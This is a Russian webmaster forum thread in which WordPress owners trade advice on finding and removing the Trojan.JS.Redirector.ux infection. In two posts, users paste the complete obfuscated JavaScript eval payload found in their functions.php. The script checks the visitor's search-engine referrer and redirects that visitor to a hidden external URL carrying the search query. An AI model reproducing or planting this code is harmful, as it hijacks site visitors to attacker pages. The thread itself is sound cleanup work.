Помощник
|
Trojan.JS.Redirector.ux - где искать и как лечить? |
Тирасполь
|
Сообщение
#1
|
||
|
|
||
|
|||
ZonaObmena |
20.3.2012, 21:33;
Ответить: ZonaObmena
Сообщение
#2
|
|
Описание у Касперского, возможно пригодится: http://www.securelist.com/ru/descriptions/12401046
-------------------- |
|
|
Тирасполь
|
Сообщение
#3
|
|
ZonaObmena, да вроде это что-то другое, у Касперского даже нет описания этой модификации
|
|
|
ZonaObmena |
20.3.2012, 22:07;
Ответить: ZonaObmena
Сообщение
#4
|
|
Да я видел, но класс вирусов один и тот же. Возможно, немного полезно будет.
-------------------- |
|
|
serg5777 |
20.3.2012, 23:23;
Ответить: serg5777
Сообщение
#5
|
|
Тут почитайте, может GreenMan уже нашёл решение проблемы.
|
|
|
Тирасполь
|
Сообщение
#6
|
|
Всем спасибо. Вроде засланец нашёлся.
Сидел в functions.php Благо, яндекс пока не среагировал. Вот кусок этой заразы: Развернуть/Свернуть
"<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function©{return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e©]=k[c]||e©;k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e©+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query
||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|locati o n'.split('|'),0,{}))</script>" |
|
|
GreenMan |
20.3.2012, 23:57;
Ответить: GreenMan
Сообщение
#7
|
|
Сидел в functions.php У меня такое же было 3 дня назад сразу на 3-х сайтах. Нашел, удалил, но сегодня Яндекс обнаруживает еще какой-то вредоносный код на двух других сайтах, проверил functions.php - уже ничего нет и больше ничего не могу найти. Какая-то атака мать их. -------------------- |
|
|
Тирасполь
|
Сообщение
#8
|
|
GreenMan, сегодня довелось услышать, что он во всех php-файлах прописывается. Посмотрел у себя, оказалось нет. Хоть это хорошо. Я, впринципе, уверен, что он ещё полезет. Главное, чтобы с наименьшими потерями победить это зло.
|
|
|
ushi_dizel |
5.4.2012, 17:44;
Ответить: ushi_dizel
Сообщение
#9
|
|
Если во всех, то во всех index.php, например. Также может прописаться во всех файлах .js, и не только скриптах темы, но и всего wordpress. Поэтому, чем быстрее вылечить , тем лучше.
Касательно этого трояна, может пригодится: Найти и удалить Trojan.JS.Redirector.ux. Новое имя старого знакомого |
|
|
ropique |
9.4.2012, 11:20;
Ответить: ropique
Сообщение
#10
|
|
У меня та же проблема(( вот в в файле funkcions есть такой код. Это он??
echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query
||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|locati o n'.split('|'),0,{}))</script>"; |
|
|
|
Похожие темы
Тема | Ответов | Автор | Просмотров | Последний ответ | |
---|---|---|---|---|---|
Как в пушсетках покупают по 100-200 тысяч кликов за день? | 2 | Boymaster | 724 | 24.4.2024, 17:52 автор: Boymaster |
|
Как вы отдыхаете от работы за компом | 151 | adw-kupon.ru | 19910 | 23.4.2024, 13:52 автор: Vmir |
|
Как вы бросили работу и перешли на заработок с сайтов? | 20 | uahomka | 3485 | 23.4.2024, 11:54 автор: Skyworker |
|
Как вывести деньги в Украине с заблокированного Юмани ? | 30 | freeax | 5048 | 20.4.2024, 16:49 автор: Liudmila |
|
Арбитражники, как ведете учет расходов и доходов? | 13 | Boymaster | 2040 | 20.4.2024, 15:06 автор: Boymaster |
Текстовая версия | Сейчас: 26.4.2024, 7:41 |